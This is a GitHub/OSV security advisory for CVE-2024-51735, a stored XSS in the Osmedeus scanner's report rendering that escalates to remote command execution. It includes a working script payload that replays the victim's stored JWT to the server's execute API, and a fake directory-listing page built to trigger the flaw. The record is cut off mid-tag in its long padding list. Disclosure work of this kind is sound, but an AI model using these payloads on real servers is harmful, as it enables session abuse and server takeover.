{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/j3ssie/osmedeus" }, "ranges": [ { "events": [ { "introduced": "0" }, { "last_affected": "4.6.4" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-51735" ], "database_specific": { "cwe_ids": [ "CWE-78", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-11-05T15:18:05Z", "nvd_published_at": "2024-11-05T19:15:07Z", "severity": "CRITICAL" }, "details": "### Summary\nXSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.\n\n### Details\nWhen using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.\n\n```\n\u003cp align=\"center\"\u003e\n \u003ca href=\"https://www.osmedeus.org\"\u003e\u003cimg alt=\"Osmedeus\" src=\"https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png\" height=\"140\" /\u003e\u003c/a\u003e\n \u003cbr /\u003e\n \u003cbr /\u003e\n \u003cstrong\u003eExecute Summary Generated by Osmedeus {{Version}} at \u003cem\u003e{{CurrentDay}}\u003c/em\u003e\u003c/strong\u003e\n\n \u003cp align=\"center\"\u003e\n \u003ca href=\"https://docs.osmedeus.org/\"\u003e\u003cimg src=\"https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge\u0026logo=GitBook\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n \u003ca href=\"https://docs.osmedeus.org/donation/\"\u003e\u003cimg src=\"https://img.shields.io/badge/Donation-0078D4?style=for-the-badge\u0026logo=GitHub-Sponsors\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n \u003ca href=\"https://twitter.com/OsmedeusEngine\"\u003e\u003cimg src=\"https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge\u0026logo=Twitter\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n \u003c/p\u003e\n\u003c/p\u003e\n\n## Scan Information \n\n\u003cscanInfo /\u003e\n\n***\n\n## \ud83d\ude80 Subdomains\n\n\u003ccontent src=\"{{Output}}/subdomain/final-{{Workspace}}.txt\" shorten=true /\u003e\n\n***\n\n## \ud83c\udf10 HTTP Fingerprint\n\n\u003ccontent src=\"{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt\" /\u003e\n\n***\n\n## \ud83d\udc1e Vulnerability\n\n### List of Vulnerability Reports\n\n- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)\n- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)\n- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)\n\n### Jaeles Scan\n\n\u003ccontent src=\"{{Output}}/vuln/active/jaeles-summary.txt\" /\u003e\n\n\u003ccontent src=\"{{Output}}/vuln/sensitive/jaeles-summary.txt\" /\u003e\n\n***\n\n### Nuclei Scan\n\n\u003ccontent src=\"{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt\" /\u003e\n\n***\n\n## \ud83d\udd77\ufe0f Spider Content\n\n\u003ccontent src=\"{{Output}}/linkfinding/links-{{Workspace}}.txt\"/\u003e\n\n***\n\n## \ud83d\udcc3 Content Discovery\n\n\u003ccontent src=\"{{Output}}/directory/unique-beautify-{{Workspace}}.txt\" /\u003e\n\n***\n\n\n## \ud83d\udd0d Port Scan\n\n\u003ccontent src=\"{{Output}}/portscan/open-ports.txt\" /\u003e\n\n\n***\n```\n\nThe contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS\nThe issue starts with processing the \u003ccontent\u003e tags, and XSS occurs when the extendTag function is called.\n\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124\n\nThe condition to enter this if branch must meet one of the following cases:\n\n* Tag shorten=true: In the default template, only subdomains have this tag \u21d2 Subdomains cannot contain special characters, so XSS is not possible.\n* len(fileContent) \u003e r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).\n\nAfter reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:\n\n* It can contain special characters since the spider retrieves results through Katana \u21d2 Katana parses content based on \u003ca\u003e tags \u21d2 We can create custom payloads by leveraging this mechanism.\"\n```\n \u003c! -- Fake Index Content --\u003e \n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\n\u003ctitle\u003eDirectory listing for /\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003eDirectory listing for /\u003c/h1\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"1\"\u003e1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"?abc=\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003eyxfzssjq_1721182234998.pdf\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n* Easily bypass the condition len(fileContent) \u003e r.Opt.MDCodeBlockLimit\n* Spider is a module within the general workflow \u21d2 a default workflow that is most commonly used\n\n### PoC\n\nhttps://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing\n\nPayload RCE\n\n`\u003cscript\u003efetch(window.location.origin+\u0027/api/osmp/execute\u0027,{method:\u0027POST\u0027,body:JSON.stringify({command:\u0027echo 1 \u003e/tmp/js.txt\u0027,password:\u0027\u0027}),headers:{Authorization:\u0027Osmedeus \u0027+localStorage.jwt,\u0027Content-Type\u0027:\u0027application/json\u0027}});\u003c/script\u003e`\n\nFile index payload\n```\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\n\u003ctitle\u003eDirectory listing for /\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003eDirectory listing for /\u003c/h1\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"1\"\u003e1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"675559605-1278d133b090b74129f65f6d108d2c83.pdf\"\u003e675559605-1278d133b090b74129f65f6d108d2c83.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe\"\u003e959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"%5BMS-DOCX%5D-240416.docx\"\u003e[MS-DOCX]-240416.docx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"AnyDesk.exe\"\u003eAnyDesk.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Attachment.zip\"\u003eAttachment.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"barker.tar\"\u003ebarker.tar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"c1awptpm_1721182413858.pdf\"\u003ec1awptpm_1721182413858.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"cacert.der\"\u003ecacert.der\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-logs-1729480323.zip\"\u003ecaido-desktop-logs-1729480323.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-v0.41.0-win-x86_64.exe\"\u003ecaido-desktop-v0.41.0-win-x86_64.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-v0.42.0-win-x86_64.exe\"\u003ecaido-desktop-v0.42.0-win-x86_64.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"cdd\"\u003ecdd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"CentOS-7-live-GNOME-x86_64.iso\"\u003eCentOS-7-live-GNOME-x86_64.iso\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"chrome-integrate.zip\"\u003echrome-integrate.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ChromeSetup.exe\"\u003eChromeSetup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf\"\u003eCode_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"CxSAST.950.Release.Setup_9.5.0.100.7z\"\u003eCxSAST.950.Release.Setup_9.5.0.100.7z\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf\"\u003eC\u00c1C QUY \u0110\u1ecaNH \u0026amp; TI\u00caU CHU\u1ea8N C\u1ea6N BI\u1ebeT CHO DOANH NGHI\u1ec6P NH\u1ef0A XU\u1ea4T KH\u1ea8U V\u00c0O EU.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Danh%20sach%20may%20chu%20T18.xlsx\"\u003eDanh sach may chu T18.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"de4dot-net45.zip\"\u003ede4dot-net45.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"de4dot-netcoreapp3.1.zip\"\u003ede4dot-netcoreapp3.1.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"desktop.ini\"\u003edesktop.ini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"disk-1.KkwpoIcO.vmdk.part\"\u003edisk-1.KkwpoIcO.vmdk.part\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"disk-1.vmdk\"\u003edisk-1.vmdk\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"dist.zip\"\u003edist.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"dnSpy-net-win64.zip\"\u003ednSpy-net-win64.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"doc.9.1.0.rar\"\u003edoc.9.1.0.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"download\"\u003edownload\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Earned_Achievements_2024-09-16.pdf\"\u003eEarned_Achievements_2024-09-16.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Eazfuscator.NET%202024.1%20Setup.msi\"\u003eEazfuscator.NET 2024.1 Setup.msi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"flare-ida-master.zip\"\u003eflare-ida-master.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"gitlab-recovery-codes.txt\"\u003egitlab-recovery-codes.txt\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Hacking%20Rust.pdf\"\u003eHacking Rust.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Huong%20dan%20cai%20dat%20Oracle%20New.docx\"\u003eHuong dan cai dat Oracle New.docx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ida83_sdk_tools_v2.zip\"\u003eida83_sdk_tools_v2.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ida84_sdk_tools.zip\"\u003eida84_sdk_tools.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"IDARustDemangler.py\"\u003eIDARustDemangler.py\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"idb2pat.py\"\u003eidb2pat.py\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"incident-notification_26.03.2024-2.pdf\"\u003eincident-notification_26.03.2024-2.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ironword.2024.8.3.nupkg\"\u003eironword.2024.8.3.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"KCSC_Recruitment.pdf\"\u003eKCSC_Recruitment.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx\"\u003eK\u1ebf ho\u1ea1ch \u0111\u00e0o t\u1ea1o 05102023 (2).xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"linkfinder.json\"\u003elinkfinder.json\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Margherita%20Report%20Demo_report.pdf\"\u003eMargherita Report Demo_report.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Mastering_Malware_Analysis.pdf\"\u003eMastering_Malware_Analysis.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx\"\u003eM\u1eabu-Danh sach Quan ly Backup-CS_v1.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"node-v20.17.0-x64.msi\"\u003enode-v20.17.0-x64.msi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip\"\u003eOpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf\"\u003eOSED Notes Study Overview by Joas Antonio.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"PAKD%20paytech.xlsx\"\u003ePAKD paytech.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"password\"\u003epassword\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"patriotctf.rar\"\u003epatriotctf.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pestudio-9.59.zip\"\u003epestudio-9.59.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-52.jpg\"\u003ephoto_2023-01-04_09-04-52.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-55%20%282%29.jpg\"\u003ephoto_2023-01-04_09-04-55 (2).jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-55.jpg\"\u003ephoto_2023-01-04_09-04-55.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2024-09-27_09-47-55.jpg\"\u003ephoto_2024-09-27_09-47-55.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx\"\u003ePh\u1ee5 l\u1ee5c 5.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"plugin.zip\"\u003eplugin.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"processhacker-2.39-setup.exe\"\u003eprocesshacker-2.39-setup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"publications.pdf\"\u003epublications.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pwnfox.json\"\u003epwnfox.json\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pykd_ext_2.0.0.25.zip\"\u003epykd_ext_2.0.0.25.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rp-win.zip\"\u003erp-win.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rs.zip\"\u003ers.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rustup-init.exe\"\u003erustup-init.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"setup.exe\"\u003esetup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Single%20Page%20Applications%20with%20Vue.js.rar\"\u003eSingle Page Applications with Vue.js.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Skilled_Person_Registration_Template_2pWPpnl.xlsx\"\u003eSkilled_Person_Registration_Template_2pWPpnl.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"snapshot_2024-10-03_12-14.zip\"\u003esnapshot_2024-10-03_12-14.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.12.7.3.nupkg\"\u003espire.doc.12.7.3.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.9.1.0.nupkg\"\u003espire.doc.9.1.0.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.cpp.11.4.5.nupkg\"\u003espire.doc.cpp.11.4.5.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"sticker.webm\"\u003esticker.webm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Telegram%20Desktop/\"\u003eTelegram Desktop/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test\"\u003etest\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test.php\"\u003etest.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test2\"\u003etest2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test1.php\"\u003etest1.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test2.php\"\u003etest2.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test3.php\"\u003etest3.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test4.php\"\u003etest4.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test5.php\"\u003etest5.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test6.php\"\u003etest6.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test7.php\"\u003etest7.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test8.php\"\u003etest8.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test9.php\"\u003etest9.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test10.php\"\u003etest10.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test11.php\"\u003etest11.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test12.php\"\u003etest12.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test13.php\"\u003etest13.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test14.php\"\u003etest14.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test15.php\"\u003etest15.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test16.php\"\u003etest16.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test17.php\"\u003etest17.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test18.php\"\u003etest18.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test19.php\"\u003etest19.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test20.php\"\u003etest20.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test21.php\"\u003etest21.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test22.php\"\u003etest22.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test23.php\"\u003etest23.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test24.php\"\u003etest24.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test25.php\"\u003etest25.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test26.php\"\u003etest26.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test27.php\"\u003etest27.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test28.php\"\u003etest28.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test29.php\"\u003etest29.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test30.php\"\u003etest30.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test31.php\"\u003etest31.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test32.php\"\u003etest32.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test33.php\"\u003etest33.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test34.php\"\u003etest34.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test35.php\"\u003etest35.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test36.php\"\u003etest36.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test37.php\"\u003etest37.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test38.php\"\u003etest38.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test39.php\"\u003etest39.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test40.php\"\u003etest40.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test41.php\"\u003etest41.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test42.php\"\u003etest42.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test43.php\"\u003etest43.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test44.php\"\u003etest44.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test45.php\"\u003etest45.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test46.php\"\u003etest46.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test47.php\"\u003etest47.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test48.php\"\u003etest48.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test49.php\"\u003etest49.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test50.php\"\u003etest50.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test51.php\"\u003etest51.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test52.php\"\u003etest52.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test53.php\"\u003etest53.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test54.php\"\u003etest54.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test55.php\"\u003etest55.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test56.php\"\u003etest56.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test57.php\"\u003etest57.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test58.php\"\u003etest58.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test59.php\"\u003etest59.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test60.php\"\u003etest60.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test61.php\"\u003etest61.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test62.php\"\u003etest62.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test63.php\"\u003etest63.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test64.php\"\u003etest64.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test65.php\"\u003etest65.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test66.php\"\u003etest66.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test67.php\"\u003etest67.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test68.php\"\u003etest68.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test69.php\"\u003etest69.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test70.php\"\u003etest70.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test71.php\"\u003etest71.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test72.php\"\u003etest72.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test73.php\"\u003etest73.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test74.php\"\u003etest74.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test75.php\"\u003etest75.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test76.php\"\u003etest76.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test77.php\"\u003etest77.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test78.php\"\u003etest78.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test79.php\"\u003etest79.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test80.php\"\u003etest80.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test81.php\"\u003etest81.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test82.php\"\u003etest82.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test83.php\"\u003etest83.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test84.php\"\u003etest84.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test85.php\"\u003etest85.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test86.php\"\u003etest86.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test87.php\"\u003etest87.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test88.php\"\u003etest88.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test89.php\"\u003etest89.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test90.php\"\u003etest90.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test91.php\"\u003etest91.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test92.php\"\u003etest92.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test93.php\"\u003etest93.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test94.php\"\u003etest94.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test95.php\"\u003etest95.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test96.php\"\u003etest96.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test97.php\"\u003etest97.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 